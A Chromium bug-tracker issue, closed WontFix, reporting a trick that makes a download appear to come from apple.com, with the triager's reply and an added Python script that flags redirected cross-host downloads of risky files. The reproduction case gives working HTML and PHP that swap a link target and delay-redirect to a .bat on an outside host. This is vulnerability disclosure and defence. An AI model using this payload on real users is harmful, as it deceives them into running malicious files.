
Issue 707574


Issue metadata

Status: WontFix
Owner: ----
Closed: Apr 2017
EstimatedDays: ----
NextAction: ----
OS: ----
Pri: ----
Type: Bug-Security


Security: We can make download dialog appear on arbitrary websites

Reported by greencar...@hotmail.com, Apr 2 2017

Issue description


VULNERABILITY DETAILS


Using some tricks, we can make it seem like a legitimate (and trusted) website is initiating a download under our control. This can lead to fooling a user into executing an application under the assumption it's from a trusted website.


Once hosted, simply visit Faker.html and click the anchor tag. You should see the magic happen.

Thank you

VERSION
Chrome Version: 57.0.2987.133 (64-bit)
Operating System: Windows 10

REPRODUCTION CASE
Two files are needed:

Faker.html:
---------------------------------------------------------------
<!-- The visible link points at a real apple.com download page; the download attribute sets the saved filename. -->
<a href='http://www.apple.com/itunes/download/' download='itunes.bat' id="qa">Click here</a>
<script>
// On mousedown (before the click fires) the href is swapped to the attacker's delaying script.
qa.onmousedown = function () {
    qa.href = 'sleeper.php';
};

// On click the current tab navigates to the apple.com post-download page,
// so the delayed download appears to come from there.
qa.onclick = function () {
    open('http://www.apple.com/itunes/download/thank-you/', '_self');
};
</script>
------------------------------------------------------------

sleeper.php:
----------------------------------------------------------
<?php
// Wait long enough for the apple.com page to finish loading in the tab,
// then redirect the download request to the actual .bat file.
sleep(3);
header('Location: http://leucosite.com/a.bat');
?>
-----------------------------------------------------------

Status: WontFix (was: Unconfirmed)
Thanks for the report. For completeness, this is what happens:

1. load faker.html and click on the download link
2. the apple.com thank you page starts loading
3. after a few seconds the a.bat file starts downloading

Ultimately, our protection for this sort of attack is Safe Browsing scanning the downloaded files and the sites offering them. Aside from that, I think there would be legitimate uses of this combination, meaning it's difficult to say it's not allowed.

Finally, this attack supposes that the user trusts faker.html as a source for a download (they have to click the download link before they get redirected to a "trusted" post-download page). That means that this doesn't work unless there's some sort of phishing or other scheme which has brought in their trust. Importantly, chrome://downloads also tells you the exact location where the file was downloaded from.

I'm closing this as WontFix since it's not directly a security exploit on its own.
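The triager's point that chrome://downloads records where a file really came from can be applied after the fact as well. The following is an added example, not code from the report or from Chromium: it queries a Chrome History-style downloads database for files that arrived through a redirect to a host other than the initiating page and were saved with a risky extension. The table and column names follow Chrome's `downloads` and `downloads_url_chains` tables, but only an assumed subset is modelled and all rows and hostnames are constructed.

```python
# Added example, not from the bug report or Chromium: flag downloads in a Chrome
# History-style database whose final source host differs from the initiating page,
# i.e. the redirect pattern the report relies on. Schema is an assumed subset.
import sqlite3
from urllib.parse import urlparse

RISKY_EXTENSIONS = (".bat", ".exe", ".cmd", ".msi", ".ps1", ".scr")

SCHEMA = """
CREATE TABLE downloads (id INTEGER PRIMARY KEY, target_path TEXT, referrer TEXT);
CREATE TABLE downloads_url_chains (id INTEGER, chain_index INTEGER, url TEXT);
"""
# Constructed rows. Download 1 models the report: the click on Faker.html requests
# sleeper.php on the same host, which redirects to a .bat on a third host.
# Download 2 is an ordinary same-origin download used as the negative case.
SAMPLE_DOWNLOADS = [
    (1, r"C:\Users\alice\Downloads\itunes.bat", "http://faker.example/Faker.html"),
    (2, r"C:\Users\alice\Downloads\report.pdf", "https://trusted.example/docs/"),
]
SAMPLE_CHAINS = [
    (1, 0, "http://faker.example/sleeper.php"),
    (1, 1, "http://payload.example/a.bat"),
    (2, 0, "https://trusted.example/docs/report.pdf"),
]

def host(url):
    return (urlparse(url).hostname or "").lower()

def build_sample_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executemany("INSERT INTO downloads VALUES (?,?,?)", SAMPLE_DOWNLOADS)
    conn.executemany("INSERT INTO downloads_url_chains VALUES (?,?,?)", SAMPLE_CHAINS)
    return conn

def suspicious_downloads(conn):
    """(id, target_path, referrer, final_url) for redirected, cross-host, risky files."""
    rows = conn.execute("""
        SELECT d.id, d.target_path, d.referrer,
               (SELECT url FROM downloads_url_chains c WHERE c.id = d.id
                ORDER BY c.chain_index DESC LIMIT 1),
               (SELECT COUNT(*) FROM downloads_url_chains c WHERE c.id = d.id)
        FROM downloads d""").fetchall()
    findings = []
    for did, path, referrer, final_url, hops in rows:
        # Only a redirect that lands on a different host than the initiating page counts.
        if hops > 1 and host(final_url) != host(referrer) \
                and path.lower().endswith(RISKY_EXTENSIONS):
            findings.append((did, path, referrer, final_url))
    return findings
```

Against a real profile, point `sqlite3.connect` at a copy of the History file instead of building the sample database; the same query applies.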
Project Member

Comment 2 by sheriffbot@chromium.org, Jul 10 2017

Labels: -Restrict-View-SecurityTeam allpublic
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
